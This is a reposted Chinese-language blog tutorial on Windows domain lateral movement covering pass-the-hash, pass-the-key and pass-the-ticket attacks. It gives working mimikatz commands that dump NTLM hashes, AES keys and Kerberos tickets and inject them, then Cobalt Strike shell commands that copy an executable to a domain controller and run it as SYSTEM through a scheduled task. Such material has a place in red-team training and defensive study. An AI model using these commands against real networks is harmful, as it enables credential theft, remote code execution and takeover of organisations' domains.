傳遞攻擊-橫向移動
目錄- 傳遞攻擊-橫向移動
- 一、哈希傳遞攻擊(PTH)
- 二、哈希傳遞條件
- 三、哈希傳遞攻擊步驟
- 四、密鑰傳遞攻擊(PTK)
- 五、KB2871997補丁
- 六、密鑰傳遞攻擊步驟
- 七、票據傳遞攻擊(PTT)
- 八、票據傳遞攻擊兩種方式
- 九、票據傳遞攻擊步驟
一、哈希傳遞攻擊(PTH)
哈希傳遞攻擊(Pass The Hash)是基于 NTLM 認證缺陷的一種攻擊方式,攻擊者可以利用用戶的密碼哈希值來進行 NTLM 認證,
二、哈希傳遞條件
哈希傳遞攻擊的前提:有管理員的 NTLM Hash ,并且目標機器開放445埠,
作業組環境中:
(1)Windows Vista 之前的機器,可以使用本地管理員組內用戶進行攻擊,
(2)Windows Vista 之后的機器,只能是administrator(SID為500)用戶的哈希值才能進行哈希傳遞攻擊,其他用戶(包括管理員用戶但是非administrator)也不能使用哈希傳遞攻擊,會提示拒絕訪問,
域環境中:
只能是域管理員組內用戶(可以是域管理員組內非administrator用戶)的哈希值才能進行哈希傳遞攻擊,攻擊成功后,可以訪問域內任何一臺機器,
三、哈希傳遞攻擊步驟
1、使用CS遠控一臺機器
2、通過這臺機器進行資訊收集,使用mimikatz抓取administrator用戶的NTLM哈希值
mimikatz sekurlsa::logonPasswords
3、拿到哈希值,可以嘗試哈希傳遞
mimikatz "sekurlsa::pth" /user:用戶名 /domain:域名 /ntlm:ntlm值
四、密鑰傳遞攻擊(PTK)
密鑰傳遞攻擊 (pass the key)是在域中攻擊 kerberos 認證的一種方式,原理是通過獲取用戶的aes,通過 kerberos 認證,可在NTLM認證被禁止的情況下用來實作類似pth的功能,
五、KB2871997補丁
安裝了KB2871997補丁或者系統版本大于windows server 2012時,系統的記憶體不保存明文的密碼,
KB2871997 補丁發布后常規的 Pass The Hash已經無法成功(除了 SID 500 賬號例外),但是還可以通過AES密鑰來替代NTLM驗證進行橫向的操作,
六、密鑰傳遞攻擊步驟
1、使用CS遠控一臺域內機器
2、抓取aes值
mimikatz sekurlsa::ekeys
3、拿到aes值,可以嘗試密碼傳遞
sekurlsa::pth /user:用戶名 /domain:域名 /aes256:aes256 值
七、票據傳遞攻擊(PTT)
票據傳遞攻擊(Pass-the-Ticket) 是一類利用后攻擊,涉及盜竊和重復使用 Kerberos 票證,以在受感染的環境中對系統進行身份驗證,在 Pass-the-Ticket 攻擊中,攻擊者從一臺計算機上竊取 Kerberos 票證,并重新使用它來訪問受感染環境中的另一臺計算機,
八、票據傳遞攻擊兩種方式
1、自己制作票據
2、傳遞記憶體中的票據
九、票據傳遞攻擊步驟
以下是傳遞記憶體中的票據方式:
1、匯出記憶體的票據
mimikatz "sekurlsa::tickets" /export
2、清除記憶體中的票據
mimikatz kerberos::purge
3、將高權限的票據檔案注入記憶體
mimikatz kerberos::ptt 票據名
4、查看票據
mimikatz kerberos::tgt
5、上線域控
(1)復制檔案
shell copy C:\Users\Administrator\Desktop\trust\can.exe \\dc.candada.com\C$
(2)創建計劃任務
shell schtasks /create /s dc.candada.com /tn can /sc onstart /tr c:\can.exe /ru system /f
(3)運行計劃任務
shell schtasks /run /s dc.candada.com /i /tn "can"
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/554854.html
標籤:其他
上一篇:程式員需要達到什么水平才能不被性別歧視?順利拿到 20k 無壓力?
下一篇:返回列表